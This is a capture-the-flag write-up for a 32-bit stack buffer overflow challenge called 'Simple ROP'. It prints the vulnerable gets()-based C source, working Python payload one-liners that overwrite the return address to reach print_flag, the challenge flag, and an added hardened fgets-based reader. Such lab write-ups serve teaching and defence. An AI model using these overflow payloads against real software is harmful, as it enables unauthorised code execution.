# Simple ROP - 120 Points

### Solution

###### Writeup by VoidMercy from phsst

We were given a binary and its source code:


#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void print_flag();
void what_did_you_say();

int main(int argc, char* argv[])
{
gid_t gid = getegid();
setresgid(gid, gid, gid);
what_did_you_say();
return 0;
}

void print_flag()
{
system("cat flag.txt");
}

void what_did_you_say()
{
char buff[64];
gets(buff);
printf("You said: %s\n", buff);
}


As the problem name suggests, this is a ROP problem. `print_flag()` is never called by the program, so we have to redirect execution into it ourselves; the first step is to get its address:

```sh
objdump -d simplerop | grep "print_flag"
```

We find the address of `print_flag` to be `0x804851a`.

Then we have to find the number of characters needed before the saved return address is reached, since overwriting it gives us control of EIP when `what_did_you_say()` returns. After that padding we append the address of `print_flag()` in little-endian byte order (the hex string reversed in chunks of two hex digits, i.e. one byte at a time), and pipe the input through Python so that the non-printable bytes can be emitted.


python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS

python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS

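To show the other side of this bug, here is an added C example (not part of the original write-up or the challenge) of what a bounded version of `what_did_you_say()` looks like and how it behaves on the same 80-byte input. `read_line_bounded`, `stored_length_of`, `was_truncated`, `overlong_line` and `encode_le32` are hypothetical names; the input strings are constructed for the demonstration, and `fmemopen` is only used to feed a string through the reader as if it were stdin. `encode_le32` also reproduces the little-endian byte string used above so the byte-order step is visible in code.

```c
#define _GNU_SOURCE          /* for fmemopen() */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUFF_SIZE 64         /* same buffer size as the challenge */

/* Hypothetical hardened replacement for the challenge's what_did_you_say().
 * fgets() stores at most BUFF_SIZE - 1 characters plus a NUL, so an
 * over-long line is cut off inside buff instead of running over the saved
 * EBP and return address above it. Returns the number of characters kept
 * (newline stripped) or -1 on EOF/error; *truncated is set to 1 when part
 * of the line had to be dropped. */
int read_line_bounded(FILE *in, char *out, size_t out_size, int *truncated)
{
    char buff[BUFF_SIZE];
    int c;

    *truncated = 0;
    if (fgets(buff, sizeof buff, in) == NULL)
        return -1;

    size_t len = strlen(buff);
    if (len > 0 && buff[len - 1] == '\n') {
        buff[--len] = '\0';            /* complete line: strip the newline */
    } else if (len == sizeof buff - 1) {
        /* Buffer filled without a newline: drain the rest of the line so it
         * is not read as the next line, and flag truncation unless only the
         * newline itself was left over. */
        c = fgetc(in);
        if (c != EOF && c != '\n') {
            *truncated = 1;
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;
        }
    }

    if (out_size > 0) {
        strncpy(out, buff, out_size - 1);
        out[out_size - 1] = '\0';
    }
    return (int)len;
}

/* Constructed helpers: feed a string through the reader via fmemopen. */
int stored_length_of(const char *input)
{
    char out[BUFF_SIZE];
    int truncated;
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    int n = read_line_bounded(in, out, sizeof out, &truncated);
    fclose(in);
    return n;
}

int was_truncated(const char *input)
{
    char out[BUFF_SIZE];
    int truncated = 0;
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    read_line_bounded(in, out, sizeof out, &truncated);
    fclose(in);
    return truncated;
}

/* Constructed sample input: 76 filler bytes plus four more where the return
 * address would sit, then the newline that Python's print appends. */
const char *overlong_line(void)
{
    static char line[76 + 4 + 2];
    memset(line, 'A', 80);
    line[80] = '\n';
    line[81] = '\0';
    return line;
}

/* Little-endian encoding of a 32-bit value: why 0x804851a is written as
 * "\x1a\x85\x04\x08" in the payload above. */
void encode_le32(uint32_t value, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Returns 1 if encode_le32 reproduces the byte string used in the write-up. */
int page_address_encodes_as_expected(void)
{
    static const unsigned char expected[4] = { 0x1a, 0x85, 0x04, 0x08 };
    unsigned char got[4];
    encode_le32(0x804851a, got);
    return memcmp(got, expected, sizeof got) == 0;
}

int main(void)
{
    const char *line = overlong_line();
    printf("hardened reader kept %d of %zu bytes, truncated=%d\n",
           stored_length_of(line), strlen(line) - 1, was_truncated(line));
    printf("0x804851a little-endian matches write-up bytes: %s\n",
           page_address_encodes_as_expected() ? "yes" : "no");
    return 0;
}
```

With the 80-byte line the bounded reader keeps 63 characters and reports truncation, so nothing past `buff` is touched and the `ret` still uses the original return address. Compiling with the default `-fstack-protector` would also catch the original overwrite (the canary check aborts before `ret` executes), but it is a detection of the corruption, not a fix for the unbounded `gets()` call.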

## Flag

> easyctf{r0p_7o_v1ct0ry}

Original writeup: [VoidMercy/EasyCTF-Writeups-2017 - Simple ROP](https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Simple%20ROP).